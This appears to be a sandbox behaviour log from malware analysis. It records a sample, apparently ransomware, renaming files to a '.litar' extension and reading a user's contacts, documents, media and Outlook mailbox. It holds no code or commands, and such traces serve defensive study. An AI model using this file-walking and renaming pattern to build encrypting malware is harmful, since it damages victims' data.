Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\4t8dP5RHOtB8TtLqW.mp4.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\4t8dP5RHOtB8TtLqW.mp4	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\b3vNAE2PVhFDju_7yS.mp4.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\b3vNAE2PVhFDju_7yS.mp4	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\d_Y88L0xD5.mkv.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\d_Y88L0xD5.mkv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\nOS9oi.swf.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\nOS9oi.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\sd3L87.avi.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\sd3L87.avi	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\UdyiuRr9KYVW-Px_.mkv.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\UdyiuRr9KYVW-Px_.mkv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\UyfgKSYNRi6Oyp.swf.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\UyfgKSYNRi6Oyp.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\Deployment\deployment.properties.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\Deployment\deployment.properties	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\9tDINHGgROIz00XY.avi.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\9tDINHGgROIz00XY.avi	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\gpNfbjz4.avi.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\gpNfbjz4.avi	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\qTnRlL.swf.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\qTnRlL.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\tMaPYPi5JgUXP1XW.flv.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\tMaPYPi5JgUXP1XW.flv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\U3-na4Ecc7B.flv.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\U3-na4Ecc7B.flv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\w8QtRE0Av57MWN-aHv.flv.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\w8QtRE0Av57MWN-aHv.flv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\y3s8jy4WEuwL8.mp4.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\y3s8jy4WEuwL8.mp4	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\3O75JDME\www.google[1].xml.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\3O75JDME\www.google[1].xml	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml	1	Fn
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact	size = 153605, size_out = 1178	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact	size = 153605, size_out = 68382	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact	size = 153605, size_out = 1171	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact	size = 153605, size_out = 1177	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact	size = 153605, size_out = 1174	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact	size = 153605, size_out = 1172	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0N28733.jpg	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0N28733.jpg	size = 153605, size_out = 23764	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\2_-YQaqX40ls7kZnQI.png	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\2_-YQaqX40ls7kZnQI.png	size = 153605, size_out = 42883	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\4hZE9nFAdJv.png	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\4hZE9nFAdJv.png	size = 153605, size_out = 72383	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\6bvJUbgBGTbsIJMKW8.jpg	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\6bvJUbgBGTbsIJMKW8.jpg	size = 153605, size_out = 90807	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\6igNpwR0pgLT9a.m4a	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\6igNpwR0pgLT9a.m4a	size = 153605, size_out = 81913	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\75tKv_wPWu nle.flv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\75tKv_wPWu nle.flv	size = 153605, size_out = 73082	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ay_t-P.bmp	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ay_t-P.bmp	size = 153605, size_out = 54412	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\C6eN8spyaXs9O5N.wav	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\C6eN8spyaXs9O5N.wav	size = 153605, size_out = 76811	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iMKYkmcr3Dm3Fk6ffK.ots	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iMKYkmcr3Dm3Fk6ffK.ots	size = 153605, size_out = 46208	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\kP8ULRqZpLx.m4a	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\kP8ULRqZpLx.m4a	size = 153605, size_out = 84557	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\OXbBkJHSc.ods	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\OXbBkJHSc.ods	size = 153605, size_out = 87707	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\p41R3hPr.swf	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\p41R3hPr.swf	size = 153605, size_out = 20700	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\pAeUc4J9behwUSLh5ZK.ppt	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\pAeUc4J9behwUSLh5ZK.ppt	size = 153605, size_out = 69005	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\PolmUMHRORMWgP.swf	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\PolmUMHRORMWgP.swf	size = 153605, size_out = 49751	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\QATxQ8 VuKhKsG6j5boU.m4a	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\QATxQ8 VuKhKsG6j5boU.m4a	size = 153605, size_out = 15761	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\qTEbn_aHVk98J.pdf	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\qTEbn_aHVk98J.pdf	size = 153605, size_out = 41342	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\q_qr72fTT.mkv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\q_qr72fTT.mkv	size = 153605, size_out = 55183	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\rzNuUzflSMr4Y.wav	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\rzNuUzflSMr4Y.wav	size = 153605, size_out = 37178	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\t1oDIACQ6VZc-ArQIwpX.bmp	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\t1oDIACQ6VZc-ArQIwpX.bmp	size = 153605, size_out = 64401	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Yg5sCFMNs8oiIw.swf	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Yg5sCFMNs8oiIw.swf	size = 153605, size_out = 95330	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zxkgxn.exe	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zxkgxn.exe	size = 153605, size_out = 153605	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\0Q3LulVoi6BYXkATC.docx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\0Q3LulVoi6BYXkATC.docx	size = 153605, size_out = 34360	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\0r-zyx2wH0-I.pptx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\0r-zyx2wH0-I.pptx	size = 153605, size_out = 89443	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\30Wm1uP_k08jvj97lQ5Z.pptx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\30Wm1uP_k08jvj97lQ5Z.pptx	size = 153605, size_out = 81203	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\7okz4Pc-gSuOVu.docx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\7okz4Pc-gSuOVu.docx	size = 153605, size_out = 62368	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GfPtWvk5Lmj.xlsx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GfPtWvk5Lmj.xlsx	size = 153605, size_out = 37103	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GRA80ibP5ZcjgL2YpVJ.docx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GRA80ibP5ZcjgL2YpVJ.docx	size = 153605, size_out = 95277	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\kpj8t.pptx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\kpj8t.pptx	size = 153605, size_out = 86380	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\KsTqGqqzg.xlsx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\KsTqGqqzg.xlsx	size = 153605, size_out = 93014	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\OrLlCAU81JJA3-CN.docx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\OrLlCAU81JJA3-CN.docx	size = 153605, size_out = 63625	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Q4Mi.xlsx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Q4Mi.xlsx	size = 153605, size_out = 7797	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\RAIpVw9N67HN.pptx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\RAIpVw9N67HN.pptx	size = 153605, size_out = 23302	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rUyI.pptx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rUyI.pptx	size = 153605, size_out = 99324	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\TFi_rpFOJSO_vICGfl.docx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\TFi_rpFOJSO_vICGfl.docx	size = 153605, size_out = 52942	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\tGcOKsKW8vY3r.pptx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\tGcOKsKW8vY3r.pptx	size = 153605, size_out = 54901	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\tgGDARb0KAuLH86cV.pdf	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\tgGDARb0KAuLH86cV.pdf	size = 153605, size_out = 58406	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\UxVjqI79MHDnp-w7vHYP.xlsx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\UxVjqI79MHDnp-w7vHYP.xlsx	size = 153605, size_out = 20184	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Ys koK.xlsx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Ys koK.xlsx	size = 153605, size_out = 49948	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\f1KLA.m4a	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\f1KLA.m4a	size = 153605, size_out = 68428	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\NDR1.m4a	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\NDR1.m4a	size = 153605, size_out = 27145	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\RCBYlf_e4F0CAnTDs_Cv.wav	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\RCBYlf_e4F0CAnTDs_Cv.wav	size = 153605, size_out = 20588	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\U3NMPiDKOwkRxmiQp.m4a	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\U3NMPiDKOwkRxmiQp.m4a	size = 153605, size_out = 74569	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\dQ_0l6.gif	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\dQ_0l6.gif	size = 153605, size_out = 75972	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\2U_8PhFaccxBmEGBGe3v.flv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\2U_8PhFaccxBmEGBGe3v.flv	size = 153605, size_out = 42312	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\5Qd_U17.swf	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\5Qd_U17.swf	size = 153605, size_out = 18584	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\7xg3.mkv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\7xg3.mkv	size = 153605, size_out = 66813	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\gJEx.avi	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\gJEx.avi	size = 153605, size_out = 78647	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\igFrRTPuZ1KOcff.avi	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\igFrRTPuZ1KOcff.avi	size = 153605, size_out = 36436	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\M2Hq1q.mp4	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\M2Hq1q.mp4	size = 153605, size_out = 93366	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\thMFQm.flv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\thMFQm.flv	size = 153605, size_out = 40522	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vLbfj.mp4	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vLbfj.mp4	size = 153605, size_out = 71155	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\VvaG-iQ-9rXlD9Y.mkv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\VvaG-iQ-9rXlD9Y.mkv	size = 153605, size_out = 20251	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\LL-t.wav	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\LL-t.wav	size = 153605, size_out = 62233	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\PbT_4bgt7AZeNnG57IPC.avi	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\PbT_4bgt7AZeNnG57IPC.avi	size = 153605, size_out = 55115	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\rb8St5qJhaFz.bmp	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\rb8St5qJhaFz.bmp	size = 153605, size_out = 96125	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\3yYw8jcr.png	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\3yYw8jcr.png	size = 153605, size_out = 60172	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\45N3LRg1kFlD_Qyjf8.jpg	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\45N3LRg1kFlD_Qyjf8.jpg	size = 153605, size_out = 98993	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\HID JrRHaaXMym.swf	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\HID JrRHaaXMym.swf	size = 153605, size_out = 73996	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\XWPPBA.flv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\XWPPBA.flv	size = 153605, size_out = 29499	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\FRhJVbO27hszhEC4EU.odp	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\FRhJVbO27hszhEC4EU.odp	size = 153605, size_out = 76025	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\pCC1nCcN4mL.xls	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\pCC1nCcN4mL.xls	size = 153605, size_out = 81573	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\SNg4GRtr2YJUAzJ_6.ppt	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\SNg4GRtr2YJUAzJ_6.ppt	size = 153605, size_out = 90315	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst	size = 153605, size_out = 153605	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url	size = 153605, size_out = 236	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url	size = 153605, size_out = 226	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url	size = 153605, size_out = 133	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url	size = 153605, size_out = 133	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url	size = 153605, size_out = 133	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url	size = 153605, size_out = 133	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url	size = 153605, size_out = 134	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url	size = 153605, size_out = 133	1	Fn Data
